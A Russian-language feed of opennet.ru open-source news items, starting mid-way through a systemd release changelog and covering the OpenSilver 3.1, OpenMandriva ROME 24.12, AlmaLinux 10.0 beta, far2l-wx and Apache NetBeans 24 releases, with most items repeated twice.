- Добавлена новая утилита systemd-sbsign для заверения цифровой подписью исполняемых файлов в формате PE (Portable Executable), предназначенных для использования при загрузке в режиме EFI Secure Boot. Для формирования подписи могут использоваться движки и провайдеры, предоставляемые библиотекой OpenSSL. Systemd-sbsign может применяться в качестве альтернативы приложениям sbsigntool и pesign в утилите ukify при формировании универсальных образов ядра UKI (Unified Kernel Image), объединяющих в одном файле загрузчик для UEFI (UEFI boot stub), образ ядра Linux и загружаемое в память системное окружение initrd.
- Добавлена новая утилита systemd-keyutil, реализующая различные операции над закрытыми ключами и сертификатами X.509. Например, systemd-keyutil может использоваться для проверки возможности загрузки закрытых ключей и сертификатов, а так же извлечения из них открытых ключей в формате PEM.
- В unit-ах ".socket", используемых для обеспечения работы механизма активации по сокету (запуск процессов при попытке установки сетевого соединения), реализована поддержка MPTCP (Multipath TCP), расширения протокола TCP для организации работы TCP-соединения с доставкой пакетов одновременно по нескольким маршрутам через разные сетевые интерфейсы, привязанные к разным IP-адресам.
- В состав включены изменения, необходимые для сборки с использованием стандартной Си-библиотеки Musl.
- В различные компоненты systemd, выводящие индикаторы прогресса выполнения операций (например, systemd-repart, systemd-sysupdate/updatectl и importctl), добавлена возможность использования ANSI-последовательностей для анимирования отображения прогресса. Подобные последовательности пока поддерживаются только в Windows Terminal (предполагается, что со временем подобная возможность будет перенесена и в эмуляторы терминалов для Linux).
- Расширены возможности компонента systemd-sysupdate, применяемого для автоматического определения, загрузки и установки обновлений с использованием атомарного механизма замены разделов, файлов или каталогов (используются два независимых раздела/файла/каталога, на одном из которых находится текущий работающий ресурс, а на другом устанавливается очередное обновление, после чего разделы/файлы/каталоги меняются местами). На практике, systemd-sysupdate уже применяется в GNOME OS.
В дополнение к процессу systemd-sysupdate добавлен одноимённый сервис, позволяющий использовать D-Bus для управления обновлением системы непривилегированным пользователем. Для управления сервисом в состав также включена новая утилита updatectl. В systemd-sysupdate добавлен флаг "--offline" для запрета загрузки метаданных по сети и использования только уже загруженных на локальную систему версий. Для всех команд добавлена поддержка вывода в формате JSON.
- Для сервисов реализовано новое свойство "PrivatePIDs", при помощи которого можно организовать запуск процессов с PID 1 (init-процесс) в отдельном пространстве идентификаторов процессов (PID namespace). В создаваемом для запускаемого процесса окружении будут видны только процессы из созданного для него пространства имён.
- В правила udev добавлена поддержка сопоставлений без учёта регистра символов
(например, 'ATTR{foo}==i"abcd"'). Через udev реализовано предоставление непривилегированным локальным пользователям доступа ("uaccess") к устройству /dev/udmabuf, которое не...
https://opennet.ru/62380/
Выпуск платформы OpenSilver 3.1, продолжающей развитие технологии Silverlight
Опубликован выпуск проекта OpenSilver 3.1, продолжающего развитие платформы Silverlight и позволяющего создавать интерактивные web-приложения при помощи технологий C#, F#, XAML и .NET. Скомпилированные при помощи OpenSilver приложения Silverlight могут работать в любых настольных и мобильных браузерах с поддержкой WebAssembly. Для разработки могут использоваться среда Visual Studio и редактор кода VS Code, поддерживающий работу в Windows, macOS и Linux. Код проекта написан на языке C# и распространяется под лицензией MIT.
Изначально проект OpenSilver был нацелен на предоставление инструментария для продления жизни существующих Silverlight-приложений, после прекращения разработки и сопровождения платформы Silverlight компанией Microsoft в 2021 году, а также прекращения поддержки связанных с ней плагинов в браузерах. В OpenSilver поддерживаются все основные возможности движка Silverlight, включая полную поддержку языков C# и XAML, а также реализацию большей части API платформы, достаточную для использования таких C#-библиотек, как Telerik UI, WCF RIA Services, PRISM и MEF.
В текущем виде OpenSilver вышел за рамки прослойки для продления жизни Silverlight и может рассматриваться как самостоятельная платформа для создания новых приложений. Например, проектом развивается среда разработки, обеспечивается поддержка новых версий языка C# и платформы .NET, предоставляется совместимость с библиотеками на языке JavaScript.
В качестве основы OpenSilver задействован код открытых проектов Mono (mono-wasm) и Microsoft Blazor (часть ASP.NET Core), а для выполнения в браузере применяется компиляция приложений в промежуточный код WebAssembly. OpenSilver продолжает развитие проекта CSHTML5, позволяющего компилировать приложения C#/XAML/.NET в представление на языке JavaScript, пригодное для запуска в браузере, и расширяет его кодовую базу возможностями для компиляции C#/XAML/.NET в WebAssembly, а не в JavaScript.
В новой версии:
- Реализован визуальный построитель интерфейса "XAML UI Designer", реализованный на базе редактора кода Visual Studio Code (VS Code). В отличие от ранее предоставляемой визуальной среды разработки, основанной на проприетарном продукте Visual Studio, новое окружение является кросс-платформенным и помимо Windows поддерживает Linux и macOS. Для разработчиков предложено более ста готовых компонентов интерфейса, включая различные диаграммы и табличные формы работы с данными. В среду также встроен AI-помощник, позволяющий создавать и изменять интерфейсы пользователя при помощи пожеланий на естественном языке.
- Улучшены возможности для использования фреймворка "WPF" (Windows Presentation Foundation) в приложениях, рассчитанных на работу в браузере. Добавлена поддержка таких компонентов, как DynamicResource, MultiBinding и UniformGrid. Конечной целью проекта является достижение полной совместимости с WPF и предоставление возможности запуска в Web приложений на базе WPF.
- Добавлена поддержка платформы .NET 9.
- Реализована новая тема оформления интерфейса, основанная на концепциях дизайна Material Design и Fluent Design. Тема доступна в тёмном и светлом варианте. Добавлены средства для создания собственных тем оформления.
https://opennet.ru/62382/
Опубликован выпуск проекта OpenSilver 3.1, продолжающего развитие платформы Silverlight и позволяющего создавать интерактивные web-приложения при помощи технологий C#, F#, XAML и .NET. Скомпилированные при помощи OpenSilver приложения Silverlight могут работать в любых настольных и мобильных браузерах с поддержкой WebAssembly. Для разработки могут использоваться среда Visual Studio и редактор кода VS Code, поддерживающий работу в Windows, macOS и Linux. Код проекта написан на языке C# и распространяется под лицензией MIT.
Изначально проект OpenSilver был нацелен на предоставление инструментария для продления жизни существующих Silverlight-приложений, после прекращения разработки и сопровождения платформы Silverlight компанией Microsoft в 2021 году, а также прекращения поддержки связанных с ней плагинов в браузерах. В OpenSilver поддерживаются все основные возможности движка Silverlight, включая полную поддержку языков C# и XAML, а также реализацию большей части API платформы, достаточную для использования таких C#-библиотек, как Telerik UI, WCF RIA Services, PRISM и MEF.
В текущем виде OpenSilver вышел за рамки прослойки для продления жизни Silverlight и может рассматриваться как самостоятельная платформа для создания новых приложений. Например, проектом развивается среда разработки, обеспечивается поддержка новых версий языка C# и платформы .NET, предоставляется совместимость с библиотеками на языке JavaScript.
В качестве основы OpenSilver задействован код открытых проектов Mono (mono-wasm) и Microsoft Blazor (часть ASP.NET Core), а для выполнения в браузере применяется компиляция приложений в промежуточный код WebAssembly. OpenSilver продолжает развитие проекта CSHTML5, позволяющего компилировать приложения C#/XAML/.NET в представление на языке JavaScript, пригодное для запуска в браузере, и расширяет его кодовую базу возможностями для компиляции C#/XAML/.NET в WebAssembly, а не в JavaScript.
В новой версии:
- Реализован визуальный построитель интерфейса "XAML UI Designer", реализованный на базе редактора кода Visual Studio Code (VS Code). В отличие от ранее предоставляемой визуальной среды разработки, основанной на проприетарном продукте Visual Studio, новое окружение является кросс-платформенным и помимо Windows поддерживает Linux и macOS. Для разработчиков предложено более ста готовых компонентов интерфейса, включая различные диаграммы и табличные формы работы с данными. В среду также встроен AI-помощник, позволяющий создавать и изменять интерфейсы пользователя при помощи пожеланий на естественном языке.
- Улучшены возможности для использования фреймворка "WPF" (Windows Presentation Foundation) в приложениях, рассчитанных на работу в браузере. Добавлена поддержка таких компонентов, как DynamicResource, MultiBinding и UniformGrid. Конечной целью проекта является достижение полной совместимости с WPF и предоставление возможности запуска в Web приложений на базе WPF.
- Добавлена поддержка платформы .NET 9.
- Реализована новая тема оформления интерфейса, основанная на концепциях дизайна Material Design и Fluent Design. Тема доступна в тёмном и светлом варианте. Добавлены средства для создания собственных тем оформления.
https://opennet.ru/62382/
Выпуск дистрибутива OpenMandriva ROME 24.12
Проект OpenMandriva опубликовал релиз OpenMandriva ROME 24.12, редакции дистрибутива OpenMandriva, использующей модель непрерывной доставки обновлений (rolling-выпуски). Предложенная редакция позволяет получить доступ к новым версиям пакетов, развиваемым для ветки OpenMandriva Lx 6, не дожидаясь формирования классического дистрибутива. Для загрузки подготовлены iso-образы размером 2.3-3.2 ГБ c рабочими столами KDE5, KDE6 с Wayland, KDE6 с X11, GNOME, Cosmic и LXQt, поддерживающие загрузку в Live-режиме.
Особенности выпуска:
- Началось формирование сборок с альфа-версией среды рабочего стола COSMIC, написанной на языке Rust.
- Компоненты среды рабочего стола KDE обновлены до версий KDE Plasma 6.2.4, KDE Gears 24.08.3, KDE Frameworks 6.8.0 и Qt 6.8.0. По умолчанию продолжает использоваться графический стек на базе X11, но отдельно подготовлен iso-образ с KDE Plasma 6 на базе Wayland Кроме того, доступны сборки и пакеты с KDE Plasma 5.27 и Qt 5.15.
- В репозиторий OpenMandriva добавлены отдельные пакеты proton и proton-experimental, позволяющие запускать игры без привязки к пакету Steam.
- Усовершенствовано приложение первого входа в систему OM-Welcome, в которое добавлены дополнительные модули для упрощения установки наиболее популярных программ.
- Обновлены системные компоненты: ядро Linux 6.12.1 (опционально доступен пакет с ядром 6.13-rc1), LLVM/Clang 19.1.4, GCC 14.2.0, Glibc 2.40, Systemd 256.9, Mesa 24.3.0.
- Обновлены пользовательские приложения: LibreOffice 24.8.3 (с компонентами для интеграции с Qt 6 и KDE Plasma 6), Chromium 131.0.6778.86 (с патчами для отключения обращения к сервисам Google и возвращением поддержи формата JPEG-XL), Firefox 133.0 (с патчами для отключения обращений к серверам Mozilla), Falkon 24.08.3, GIMP 3.0 rc, VirtualBox 7.1.4.
https://opennet.ru/62384/
Проект OpenMandriva опубликовал релиз OpenMandriva ROME 24.12, редакции дистрибутива OpenMandriva, использующей модель непрерывной доставки обновлений (rolling-выпуски). Предложенная редакция позволяет получить доступ к новым версиям пакетов, развиваемым для ветки OpenMandriva Lx 6, не дожидаясь формирования классического дистрибутива. Для загрузки подготовлены iso-образы размером 2.3-3.2 ГБ c рабочими столами KDE5, KDE6 с Wayland, KDE6 с X11, GNOME, Cosmic и LXQt, поддерживающие загрузку в Live-режиме.
Особенности выпуска:
- Началось формирование сборок с альфа-версией среды рабочего стола COSMIC, написанной на языке Rust.
- Компоненты среды рабочего стола KDE обновлены до версий KDE Plasma 6.2.4, KDE Gears 24.08.3, KDE Frameworks 6.8.0 и Qt 6.8.0. По умолчанию продолжает использоваться графический стек на базе X11, но отдельно подготовлен iso-образ с KDE Plasma 6 на базе Wayland Кроме того, доступны сборки и пакеты с KDE Plasma 5.27 и Qt 5.15.
- В репозиторий OpenMandriva добавлены отдельные пакеты proton и proton-experimental, позволяющие запускать игры без привязки к пакету Steam.
- Усовершенствовано приложение первого входа в систему OM-Welcome, в которое добавлены дополнительные модули для упрощения установки наиболее популярных программ.
- Обновлены системные компоненты: ядро Linux 6.12.1 (опционально доступен пакет с ядром 6.13-rc1), LLVM/Clang 19.1.4, GCC 14.2.0, Glibc 2.40, Systemd 256.9, Mesa 24.3.0.
- Обновлены пользовательские приложения: LibreOffice 24.8.3 (с компонентами для интеграции с Qt 6 и KDE Plasma 6), Chromium 131.0.6778.86 (с патчами для отключения обращения к сервисам Google и возвращением поддержи формата JPEG-XL), Firefox 133.0 (с патчами для отключения обращений к серверам Mozilla), Falkon 24.08.3, GIMP 3.0 rc, VirtualBox 7.1.4.
https://opennet.ru/62384/
Бета-выпуск дистрибутива AlmaLinux 10.0, синхронизированного с RHEL 10
Проект AlmaLinux объявил о тестировании бета-версии дистрибутива AlmaLinux 10.0, синхронизированного c новой веткой Red Hat Enterprise Linux 10 и содержащий все предложенные в ней изменения. Дистрибутив по возможности бинарно совместим с Red Hat Enterprise Linux и может использоваться в качестве замены RHEL 10 и CentOS 10 Stream. Установочные образы подготовлены для архитектур x86_64, x86_64_v2, ARM64 (aarch64), IBM PowerPC (ppc64le) и IBM Z (s390x).
Со списком новшеств AlmaLinux 10 можно познакомиться в обзоре изменений, предложенных в RHEL 10-beta. По функциональности AlmaLinux 10 повторяет RHEL 10 за исключением ребрендинга и следующих отличий:
- Сформированы отдельные сборки для второй версии микроархитектуры x86-64 (x86-64-v2), которые сопровождаются параллельно с базовыми сборками x86-64, формируемыми с оптимизациями для микроархитектуры x86-64-v3, которая используется в RHEL 10. Дополнительная поддержка x86-64-v2 позволяет обеспечить совместимость с CPU старше Intel Haswell и AMD Excavator, спроектированными до 2013 года.
- Возвращено использование процессорного регистра %rbp в качестве базового указателя на кадр стека, содержащий адреса возврата и переменные функции (frame pointer). Использование указателя на кадры стека позволяет использовать в дистрибутиве дополнительные возможности для трассировки и профилирования системы.
- Возвращены серверные и клиентские реализации протокола SPICE, позволяющего организовать удаленную работу с рабочим столом, функционирующим в виртуальном окружении под управлением QEMU/KVM. В отличие от протоколов VNC и RDP в SPICE отрисовка содержимого экрана и обработка аудиопотоков производится на стороне клиента, а не на сервере. В RHEL поддержка SPICE была прекращена в выпуске 9.0.
- Реализована возможность использования гипервизора KVM на системах с процессорами IBM POWER. В RHEL подобная поддержка была прекращена в ветке 9.0.
- В репозитории включены rpm-пакеты c Firefox и Thunderbird (в CentOS Stream 10 и RHEL10 предлагается устанавливать Firefox и Thunderbird из пакетов в формате flatpak).
- Возобновлена поддержка 144 аппаратных устройств, не поддерживаемых в RHEL 10. Например, возвращены идентификаторы старых PCI-устройств в драйверах:
- aacraid - Dell PERC2, 2/Si, 3/Si, 3/Di, Adaptec Advanced Raid Products, HP NetRAID-4M, IBM ServeRAID & ICP SCSI
- be2iscsi - Emulex OneConnectOpen-iSCSI для BladeEngine 2 и 3
- be2net - Emulex BladeEngine 2 and 3 adapters *
- hpsa - HP Smart Array Controller
- lpfc - Emulex LightPulse Fibre Channel SCSI
- megaraid_sas - Broadcom MegaRAID SAS
- mlx4_core - Mellanox Gen2 и ConnectX-2
- mpt3sas - LSI MPT Fusion SAS 3.0
- mptsas - Fusion MPT SAS Host
- qla2xxx - QLogic Fibre Channel HBA
- qla4xxx - QLogic iSCSI HBA.
Дистрибутив AlmaLinux основан компанией CloudLinux в ответ на преждевременное сворачивание поддержки CentOS 8 компанией Red Hat (выпуск обновлений для CentOS 8 прекращён в конце 2021 года, а не в 2029 году, как предполагали пользователи). Проект курирует отдельная некоммерческая организация AlmaLinux OS Foundation, которая была создана для разработки на нейтральной площадке с участием сообщества и c использованием модели управления, похожей на организацию работы проекта Fedora. Дистрибутив бесплатен для всех категорий пользователей. Все наработки AlmaLinux публикуются под свободными лицензиями.
https://opennet.ru/62385/
Проект AlmaLinux объявил о тестировании бета-версии дистрибутива AlmaLinux 10.0, синхронизированного c новой веткой Red Hat Enterprise Linux 10 и содержащий все предложенные в ней изменения. Дистрибутив по возможности бинарно совместим с Red Hat Enterprise Linux и может использоваться в качестве замены RHEL 10 и CentOS 10 Stream. Установочные образы подготовлены для архитектур x86_64, x86_64_v2, ARM64 (aarch64), IBM PowerPC (ppc64le) и IBM Z (s390x).
Со списком новшеств AlmaLinux 10 можно познакомиться в обзоре изменений, предложенных в RHEL 10-beta. По функциональности AlmaLinux 10 повторяет RHEL 10 за исключением ребрендинга и следующих отличий:
- Сформированы отдельные сборки для второй версии микроархитектуры x86-64 (x86-64-v2), которые сопровождаются параллельно с базовыми сборками x86-64, формируемыми с оптимизациями для микроархитектуры x86-64-v3, которая используется в RHEL 10. Дополнительная поддержка x86-64-v2 позволяет обеспечить совместимость с CPU старше Intel Haswell и AMD Excavator, спроектированными до 2013 года.
- Возвращено использование процессорного регистра %rbp в качестве базового указателя на кадр стека, содержащий адреса возврата и переменные функции (frame pointer). Использование указателя на кадры стека позволяет использовать в дистрибутиве дополнительные возможности для трассировки и профилирования системы.
- Возвращены серверные и клиентские реализации протокола SPICE, позволяющего организовать удаленную работу с рабочим столом, функционирующим в виртуальном окружении под управлением QEMU/KVM. В отличие от протоколов VNC и RDP в SPICE отрисовка содержимого экрана и обработка аудиопотоков производится на стороне клиента, а не на сервере. В RHEL поддержка SPICE была прекращена в выпуске 9.0.
- Реализована возможность использования гипервизора KVM на системах с процессорами IBM POWER. В RHEL подобная поддержка была прекращена в ветке 9.0.
- В репозитории включены rpm-пакеты c Firefox и Thunderbird (в CentOS Stream 10 и RHEL10 предлагается устанавливать Firefox и Thunderbird из пакетов в формате flatpak).
- Возобновлена поддержка 144 аппаратных устройств, не поддерживаемых в RHEL 10. Например, возвращены идентификаторы старых PCI-устройств в драйверах:
- aacraid - Dell PERC2, 2/Si, 3/Si, 3/Di, Adaptec Advanced Raid Products, HP NetRAID-4M, IBM ServeRAID & ICP SCSI
- be2iscsi - Emulex OneConnectOpen-iSCSI для BladeEngine 2 и 3
- be2net - Emulex BladeEngine 2 and 3 adapters *
- hpsa - HP Smart Array Controller
- lpfc - Emulex LightPulse Fibre Channel SCSI
- megaraid_sas - Broadcom MegaRAID SAS
- mlx4_core - Mellanox Gen2 и ConnectX-2
- mpt3sas - LSI MPT Fusion SAS 3.0
- mptsas - Fusion MPT SAS Host
- qla2xxx - QLogic Fibre Channel HBA
- qla4xxx - QLogic iSCSI HBA.
Дистрибутив AlmaLinux основан компанией CloudLinux в ответ на преждевременное сворачивание поддержки CentOS 8 компанией Red Hat (выпуск обновлений для CentOS 8 прекращён в конце 2021 года, а не в 2029 году, как предполагали пользователи). Проект курирует отдельная некоммерческая организация AlmaLinux OS Foundation, которая была создана для разработки на нейтральной площадке с участием сообщества и c использованием модели управления, похожей на организацию работы проекта Fedora. Дистрибутив бесплатен для всех категорий пользователей. Все наработки AlmaLinux публикуются под свободными лицензиями.
https://opennet.ru/62385/
В Debian testing добавлена графическая версия файлового менеджера far2l
В репозитории Debian testing добавлен пакет far2l-wx с графической версией порта файлового менеджера FAR 2 для Linux, использующей wxGTK. Появление пакета far2l-wx в Ubuntu ожидается в версии 25.04.
Стандартные unix-терминалы не всегда предоставляют функциональность, необходимую консольным приложениям Windows (например, доступ к буферу обмена, поддержка сложных сочетаний клавиш, таких как RightCtrl+цифры, вывод уведомлений и т.д.), или предоставляют её частично. Графическая версия far2l (пакет far2l-wx), исторически появившаяся даже раньше консольной, решает эту проблему. Сам far2l остаётся текстовым приложением, но отрисовка окна и ввод обрабатывается тулкитом wxWidgets. Это позволяет реализовать в текстовом интерфейсе любые возможности Windows-консоли.
Более того, сам far2l содержит встроенный терминал, так что с появлением пакета far2l-wx больше не нужно устанавливать дополнительные терминалы, достаточно продвинутые для его нормальной работы — наоборот, сам far2l сможет работать в качестве достаточно продвинутого терминала (поддерживающего все возможности, необходимые консольному Far-у). Теперь не надо выбирать терминал, подходящий для комфортной работы в Far Manager под Linux, и вспоминать, какие дополнительные настройки нужно применить, чтоб получить комфортный UX — всё работает из коробки (в некоторых средах рабочего стола может потребоваться включить опцию «эксклюзивная обработка клавиш» в настройках самого far2l).
https://opennet.ru/62386/
В репозитории Debian testing добавлен пакет far2l-wx с графической версией порта файлового менеджера FAR 2 для Linux, использующей wxGTK. Появление пакета far2l-wx в Ubuntu ожидается в версии 25.04.
Стандартные unix-терминалы не всегда предоставляют функциональность, необходимую консольным приложениям Windows (например, доступ к буферу обмена, поддержка сложных сочетаний клавиш, таких как RightCtrl+цифры, вывод уведомлений и т.д.), или предоставляют её частично. Графическая версия far2l (пакет far2l-wx), исторически появившаяся даже раньше консольной, решает эту проблему. Сам far2l остаётся текстовым приложением, но отрисовка окна и ввод обрабатывается тулкитом wxWidgets. Это позволяет реализовать в текстовом интерфейсе любые возможности Windows-консоли.
Более того, сам far2l содержит встроенный терминал, так что с появлением пакета far2l-wx больше не нужно устанавливать дополнительные терминалы, достаточно продвинутые для его нормальной работы — наоборот, сам far2l сможет работать в качестве достаточно продвинутого терминала (поддерживающего все возможности, необходимые консольному Far-у). Теперь не надо выбирать терминал, подходящий для комфортной работы в Far Manager под Linux, и вспоминать, какие дополнительные настройки нужно применить, чтоб получить комфортный UX — всё работает из коробки (в некоторых средах рабочего стола может потребоваться включить опцию «эксклюзивная обработка клавиш» в настройках самого far2l).
https://opennet.ru/62386/
Доступна интегрированная среда разработки Apache NetBeans 24
Представлен выпуск интегрированной среды разработки Apache NetBeans 24, которая предоставляет поддержку языков программирования Java SE, Java EE, PHP, C/C++, JavaScript, Rust и Groovy. Готовые сборки в ближайшее время будут сформированы для Linux (snap, flatpak), Windows и macOS.
Среди предложенных изменений:
- В редакторе добавлена поддержка предпросмотра кода в результатах поиска, а также возможность быстрого предпросмотра содержимого файлов, обнаруженных при использовании функции "Find Usage" и инструментов рефакторинга.
- В редакторе расширены возможности подсветки идентификаторов, на которых находится курсор. Добавлена опция для сохранения выделения после перемещения курсора в другое место. В полосе прокрутки реализованы метки позиций подсвеченных идентификаторов.
- Добавлены масштабируемые пиктограммы в формате SVG, а также ICO-файлы в более высоком разрешении.
- В редакторе кода обеспечен показ символов, несмотря на их отсутствие в выбранном шрифте.
- Движок тем оформления FlatLaf обновлён до версии 3.5.2.
- Расширены возможности, связанные с использованием серверов LSP (Language Server Protocol).
- Улучшена поддержка систем сборки Gradle и Maven. Добавлена начальная поддержка API для загрузки проектов Gradle и Maven. Движок индексации данных в Maven обновлён до Lucene 9.12.0.
- При сборке с использованием инструментария Ant реализована поддержка Java-архивов src.zip, включающих несколько модулей, размещённых в разных подкаталогах.
- Для проектов на языке Java реализована поддержка использования разметки Markdown в документации javadoc.
- В окружении для языка PHP появилась поддержка статического анализатора Psalm.
- Добавлена поддержка платформ Jakarta EE 11 и Payara 7.
- В окружении для web-проектов добавлена поддержка @-правил в CSS и улучшена поддержка языка Typescript.
https://opennet.ru/62383/
Представлен выпуск интегрированной среды разработки Apache NetBeans 24, которая предоставляет поддержку языков программирования Java SE, Java EE, PHP, C/C++, JavaScript, Rust и Groovy. Готовые сборки в ближайшее время будут сформированы для Linux (snap, flatpak), Windows и macOS.
Среди предложенных изменений:
- В редакторе добавлена поддержка предпросмотра кода в результатах поиска, а также возможность быстрого предпросмотра содержимого файлов, обнаруженных при использовании функции "Find Usage" и инструментов рефакторинга.
- В редакторе расширены возможности подсветки идентификаторов, на которых находится курсор. Добавлена опция для сохранения выделения после перемещения курсора в другое место. В полосе прокрутки реализованы метки позиций подсвеченных идентификаторов.
- Добавлены масштабируемые пиктограммы в формате SVG, а также ICO-файлы в более высоком разрешении.
- В редакторе кода обеспечен показ символов, несмотря на их отсутствие в выбранном шрифте.
- Движок тем оформления FlatLaf обновлён до версии 3.5.2.
- Расширены возможности, связанные с использованием серверов LSP (Language Server Protocol).
- Улучшена поддержка систем сборки Gradle и Maven. Добавлена начальная поддержка API для загрузки проектов Gradle и Maven. Движок индексации данных в Maven обновлён до Lucene 9.12.0.
- При сборке с использованием инструментария Ant реализована поддержка Java-архивов src.zip, включающих несколько модулей, размещённых в разных подкаталогах.
- Для проектов на языке Java реализована поддержка использования разметки Markdown в документации javadoc.
- В окружении для языка PHP появилась поддержка статического анализатора Psalm.
- Добавлена поддержка платформ Jakarta EE 11 и Payara 7.
- В окружении для web-проектов добавлена поддержка @-правил в CSS и улучшена поддержка языка Typescript.
https://opennet.ru/62383/